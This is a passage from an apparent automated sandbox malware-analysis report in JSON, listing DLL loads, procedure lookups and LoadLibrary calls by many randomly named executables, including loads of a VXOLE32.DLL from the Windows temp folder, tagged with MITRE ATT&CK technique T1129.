\"68282.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70ec0000\n \"68282.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"68282.exe\" loaded module \"KERNEL32\" at base 76aa0000\n \"68282.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"62242.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70ec0000\n \"62242.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"62242.exe\" loaded module \"KERNEL32\" at base 76aa0000\n \"62242.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"62242.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6abe0000\n \"rbldl.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70ec0000\n \"rbldl.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"rbldl.exe\" loaded module \"KERNEL32\" at base 76aa0000\n \"rbldl.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"rbldl.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6abe0000\n \"trdvh.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70ec0000\n \"trdvh.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"trdvh.exe\" loaded module \"KERNEL32\" at base 76aa0000\n \"trdvh.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"trdvh.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6abe0000\n \"trdvh.exe\" loaded module \"MSVCRT.DLL\" at base 76130000\n \"trdvh.exe\" loaded module \"SHLWAPI.DLL\" at base 76050000\n \"trdvh.exe\" loaded module \"USER32.DLL\" at base 76710000\n \"trdvh.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 75960000\n \"vdfxt.exe\" loaded module \"MSVCRT.DLL\" at base 76130000\n \"vdfxt.exe\" loaded module \"SHLWAPI.DLL\" at base 76050000\n \"vdfxt.exe\" loaded module \"USER32.DLL\" at base 76710000\n \"vdfxt.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 75960000\n \"dnppt.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70ec0000\n \"dnppt.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"dnppt.exe\" loaded module \"KERNEL32\" at base 76aa0000\n \"dnppt.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"dnppt.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6abe0000\n \"btvxfh.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70ec0000\n \"btvxfh.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"btvxfh.exe\" loaded module \"KERNEL32\" at base 76aa0000\n \"btvxfh.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"btvxfh.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6abe0000\n \"8224062.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70ec0000\n \"8224062.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"8224062.exe\" loaded module \"KERNEL32\" at base 76aa0000\n \"8224062.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"8224062.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6abe0000\n \"64660.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70ec0000\n \"64660.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"64660.exe\" loaded module \"KERNEL32\" at base 76aa0000\n \"64660.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"64660.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6abe0000\n \"xlfpx.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70ec0000\n \"xlfpx.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"xlfpx.exe\" loaded module \"KERNEL32\" at base 76aa0000\n \"xlfpx.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"xlfpx.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6abe0000\n \"pfffth.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70ec0000\n \"pfffth.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"pfffth.exe\" loaded module \"KERNEL32\" at base 76aa0000\n \"pfffth.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"jpdvr.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70ec0000\n \"jpdvr.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"jpdvr.exe\" loaded module \"KERNEL32\" at base 76aa0000\n \"jpdvr.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"jpdvr.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6abe0000\n \"682244.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70ec0000\n \"682244.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"682244.exe\" loaded module \"KERNEL32\" at base 76aa0000\n \"682244.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"682244.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6abe0000\n \"682244.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 75960000\n \"0600220.exe\" loaded module \"MSVCRT.DLL\" at base 76130000\n \"0600220.exe\" loaded module \"SHLWAPI.DLL\" at base 76050000\n \"0600220.exe\" loaded module \"USER32.DLL\" at base 76710000\n \"0600220.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 75960000\n \"0600240.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 75960000\n \"hppjr.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70ec0000\n \"hppjr.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"hppjr.exe\" loaded module \"KERNEL32\" at base 76aa0000\n \"hppjr.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"jjxfht.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70ec0000\n \"jjxfht.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"jjxfht.exe\" loaded module \"KERNEL32\" at base 76aa0000\n \"jjxfht.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"jjxfht.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6abe0000\n \"fvnph.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70ec0000\n \"fvnph.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"fvnph.exe\" loaded module \"KERNEL32\" at base 76aa0000\n \"fvnph.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"42600.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70ec0000\n \"42600.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"42600.exe\" loaded module \"KERNEL32\" at base 76aa0000\n \"42600.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"42600.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6abe0000\n \"40806.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70ec0000\n \"40806.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"40806.exe\" loaded module \"KERNEL32\" at base 76aa0000\n \"40806.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"40806.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6abe0000\n \"62046.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70ec0000\n \"62046.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"62046.exe\" loaded module \"KERNEL32\" at base 76aa0000\n \"62046.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"62046.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6abe0000\n \"62046.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 75960000\n \"pdhnvj.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70ec0000\n \"pdhnvj.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"pdhnvj.exe\" loaded module \"KERNEL32\" at base 76aa0000\n \"pdhnvj.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"pdhnvj.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6abe0000\n \"tjxjxxh.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70ec0000\n \"tjxjxxh.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"tjxjxxh.exe\" loaded module \"KERNEL32\" at base 76aa0000\n \"tjxjxxh.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"tjxjxxh.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6abe0000\n \"rnftf.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70ec0000\n \"rnftf.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"rnftf.exe\" loaded module \"KERNEL32\" at base 76aa0000\n \"rnftf.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"rnftf.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6abe0000\n \"rnftf.exe\" loaded module \"USER32.DLL\" at base 76710000\n \"rnftf.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 75960000\n \"nvfdf.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70ec0000\n \"nvfdf.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"nvfdf.exe\" loaded module \"KERNEL32\" at base 76aa0000\n \"nvfdf.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"nvfdf.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6abe0000\n \"88806.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70ec0000\n \"88806.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"88806.exe\" loaded module \"KERNEL32\" at base 76aa0000\n \"88806.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"88806.exe\" loaded module \"KERNEL32.DLL\" at base 76aa0000\n \"88806.exe\" loaded module \"MSVCRT.DLL\" at base 76130000\n \"88806.exe\" loaded module \"SHLWAPI.DLL\" at base 76050000\n \"88806.exe\" loaded module \"USER32.DLL\" at base 76710000\n \"88806.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 75960000\n \"8446060.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70ec0000\n \"8446060.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"8446060.exe\" loaded module \"KERNEL32\" at base 76aa0000\n \"8446060.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"8446060.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6abe0000\n \"42442.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70ec0000\n \"42442.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"42442.exe\" loaded module \"KERNEL32\" at base 76aa0000\n \"42442.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"42442.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6abe0000\n \"0802042.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70ec0000\n \"0802042.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"0802042.exe\" loaded module \"KERNEL32\" at base 76aa0000\n \"0802042.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"0802042.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6abe0000\n \"rttxj.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70ec0000\n \"rttxj.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"rttxj.exe\" loaded module \"KERNEL32\" at base 76aa0000\n \"rttxj.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"fdfnr.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70ec0000\n \"fdfnr.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"fdfnr.exe\" loaded module \"KERNEL32\" at base 76aa0000\n \"fdfnr.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"fdfnr.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6abe0000\n \"fdfnr.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 75960000\n \"848066.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70ec0000\n \"848066.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"848066.exe\" loaded module \"KERNEL32\" at base 76aa0000\n \"848066.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"848066.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6abe0000\n \"848066.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 75960000\n \"0024648.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70ec0000\n \"0024648.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"0024648.exe\" loaded module \"KERNEL32\" at base 76aa0000\n \"0024648.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"0024648.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6abe0000\n \"xxfflb.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70ec0000\n \"xxfflb.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"xxfflb.exe\" loaded module \"KERNEL32\" at base 76aa0000\n \"xxfflb.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"xxfflb.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6abe0000\n \"ptxnnrh.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70ec0000\n \"ptxnnrh.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"ptxnnrh.exe\" loaded module \"KERNEL32\" at base 76aa0000\n \"ptxnnrh.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"ptxnnrh.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6abe0000\n \"ptxnnrh.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 75960000\n \"vvtbdn.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70ec0000\n \"vvtbdn.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"vvtbdn.exe\" loaded module \"KERNEL32\" at base 76aa0000\n \"vvtbdn.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"vvtbdn.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6abe0000\n \"0288086.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70ec0000\n \"0288086.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"0288086.exe\" loaded module \"KERNEL32\" at base 76aa0000\n \"0288086.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"0288086.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6abe0000\n \"22004.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70ec0000\n \"22004.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"22004.exe\" loaded module \"KERNEL32\" at base 76aa0000\n \"22004.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"0086084.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70ec0000\n \"0086084.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"0086084.exe\" loaded module \"KERNEL32\" at base 76aa0000\n \"0086084.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"0086084.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6abe0000\n \"lrnlbrl.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70ec0000\n \"lrnlbrl.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"lrnlbrl.exe\" loaded module \"KERNEL32\" at base 76aa0000\n \"lrnlbrl.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"lrnlbrl.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6abe0000\n \"bvffnn.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70ec0000\n \"bvffnn.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"bvffnn.exe\" loaded module \"KERNEL32\" at base 76aa0000\n \"bvffnn.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"bvffnn.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6abe0000", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-8", "type": 6, "relevance": 1, "name": "Looks up procedures from modules (excluding apphelp.dll, kernel32.dll, user32.dll, gdi32.dll, ole32.dll, comctl32.dll, uxtheme.dll, oleaut32.dll, version.dll, msctfime.ime)", "description": "\"1300140054f42b76@RPCRT4.dll\"\n \"15001600c03ebc6a@ADVAPI32.dll\"\n \"0e000f00703fbc6a@ADVAPI32.dll\"\n \"0e000f00cc3fbc6a@ADVAPI32.dll\"\n \"11001200b447bc6a@ADVAPI32.dll\"\n \"110012004848bc6a@ADVAPI32.dll\"\n \"120013008c48bc6a@ADVAPI32.dll\"\n \"12001300e448bc6a@ADVAPI32.dll\"\n \"14001500386ebc6a@ADVAPI32.dll\"\n \"14001500506ebc6a@ADVAPI32.dll\"\n \"14001500686ebc6a@ADVAPI32.dll\"\n \"17001800806ebc6a@ADVAPI32.dll\"\n \"0d000e00986ebc6a@ADVAPI32.dll\"\n \"11001200a86ebc6a@ADVAPI32.dll\"\n \"11001200bc6ebc6a@ADVAPI32.dll\"\n \"0f001000fc6fbc6a@ADVAPI32.dll\"\n \"140015003c70bc6a@ADVAPI32.dll\"\n \"140015005470bc6a@ADVAPI32.dll\"\n \"0c000d009c70bc6a@ADVAPI32.dll\"\n \"0c000d00ac70bc6a@ADVAPI32.dll\"\n \"0e000f00bc70bc6a@ADVAPI32.dll\"\n \"0e000f00cc70bc6a@ADVAPI32.dll\"\n \"0b000c00dc70bc6a@ADVAPI32.dll\"\n \"180019001473bc6a@RPCRT4.dll\"\n \"130014004073bc6a@RPCRT4.dll\"", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-175", "type": 6, "relevance": 1, "name": "Calls an API typically used to load libraries", "description": "\"bbhhn.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00005876)\n \"bbhhn.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00005876)\n \"bbhhn.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00005876)\n \"bbhhn.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00005876)\n \"xlbdxlx.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00004308)\n \"xlbdxlx.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00004308)\n \"xlbdxlx.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00004308)\n \"xlbdxlx.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00004308)\n \"68282.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00006088)\n \"68282.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00006088)\n \"68282.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00006088)\n \"68282.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00006088)\n \"62242.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00005996)\n \"62242.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00005996)\n \"62242.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00005996)\n \"62242.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00005996)\n \"rbldl.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00004224)\n \"rbldl.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00004224)\n \"rbldl.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00004224)\n \"rbldl.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00004224)\n \"trdvh.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00002612)\n \"trdvh.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00002612)\n \"trdvh.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00002612)\n \"trdvh.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00002612)\n \"trdvh.exe\" called \"LoadLibrary\" with a parameter MSVCRT.dll (UID: 00000000-00002612)\n \"trdvh.exe\" called \"LoadLibrary\" with a parameter SHLWAPI.dll (UID: 00000000-00002612)\n \"trdvh.exe\" called \"LoadLibrary\" with a parameter USER32.dll (UID: 00000000-00002612)\n \"vdfxt.exe\" called \"LoadLibrary\" with a parameter MSVCRT.dll (UID: 00000000-00006120)\n \"vdfxt.exe\" called \"LoadLibrary\" with a parameter SHLWAPI.dll (UID: 00000000-00006120)\n \"vdfxt.exe\" called \"LoadLibrary\" with a parameter USER32.dll (UID: 00000000-00006120)\n \"dnppt.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00004300)\n \"dnppt.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00004300)\n \"dnppt.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00004300)\n \"dnppt.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00004300)\n \"btvxfh.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00005976)\n \"btvxfh.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00005976)\n \"btvxfh.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00005976)\n \"btvxfh.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00005976)\n \"8224062.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00005560)\n \"8224062.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00005560)\n \"8224062.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00005560)\n \"8224062.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00005560)\n \"64660.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00004376)\n \"64660.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00004376)\n \"64660.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00004376)\n \"64660.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00004376)\n \"xlfpx.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00002960)\n \"xlfpx.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00002960)\n \"xlfpx.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00002960)\n \"xlfpx.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00002960)\n \"pfffth.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00002380)\n \"pfffth.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00002380)\n \"pfffth.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00002380)\n \"pfffth.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00002380)\n \"jpdvr.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00002896)\n \"jpdvr.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00002896)\n \"jpdvr.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00002896)\n \"jpdvr.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00002896)\n \"682244.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00002824)\n \"682244.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00002824)\n \"682244.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00002824)\n \"682244.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00002824)\n \"0600220.exe\" called \"LoadLibrary\" with a parameter MSVCRT.dll (UID: 00000000-00003448)\n \"0600220.exe\" called \"LoadLibrary\" with a parameter SHLWAPI.dll (UID: 00000000-00003448)\n \"0600220.exe\" called \"LoadLibrary\" with a parameter USER32.dll (UID: 00000000-00003448)\n \"hppjr.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00004420)\n \"hppjr.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00004420)\n \"hppjr.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00004420)\n \"hppjr.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00004420)\n 